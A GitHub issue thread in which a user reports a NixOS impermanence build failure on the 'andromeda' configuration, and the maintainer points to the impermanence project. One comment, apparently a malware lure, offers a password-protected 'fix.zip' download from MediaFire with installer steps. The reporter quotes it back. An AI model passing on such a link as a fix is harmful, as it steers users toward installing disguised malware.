### ISSUE TITLE
failed to build andromeda

### ISSUE THREAD

**Issue by gnussbaum67** [sukhmancs/nixos-configs#72]
Hi,

Nice setup!  I'm getting the following error trying to build andromeda:

` nixos-rebuild switch --flake .#andromeda
building the system configuration...
error:
       … while calling the 'head' builtin

         at /nix/store/j8pbrsb3nybdap3hhg9kw0ffqd4rlbx6-source/lib/attrsets.nix:1575:11:

         1574|         || pred here (elemAt values 1) (head values) then
         1575|           head values
             |           ^
         1576|         else

       … while evaluating the attribute 'value'

         at /nix/store/j8pbrsb3nybdap3hhg9kw0ffqd4rlbx6-source/lib/modules.nix:821:9:

          820|     in warnDeprecation opt //
          821|       { value = addErrorContext "while evaluating the option `${showOption loc}':" value;
             |         ^
          822|         inherit (res.defsFinal') highestPrio;

       (stack trace truncated; use '--show-trace' to show the full trace)

       error:
       Failed assertions:
       - environment.persistence:
           All filesystems used for persistent storage must
           have the flag neededForBoot set to true.

           Please fix or remove the following paths:
             /persist
`
This is what's in my /etc/nixos/hardware-configuration.nix:

`  fileSystems."/persist" = {
      device = "/dev/disk/by-uuid/a24148b7-f8e9-4d59-9808-9c4b34283dc5";
      fsType = "btrfs";
      options = [ "subvol=persist" ];
      neededForBoot = true;
    };
`

Any idea why this is happening?

**Comment by SupunDevendra** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by gnussbaum67** [comment]
> Download https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file password: changeme In the installer menu, select "gcc."

![image](https://github.com/user-attachments/assets/36d32663-db6b-4fcf-82bf-d3e39c511c73)

**Comment by sukhmancs** [comment]
Probably you are missing something. You should set up a separate volume to keep your configurations persistent. You can learn more about impermanence [here](https://github.com/nix-community/impermanence).
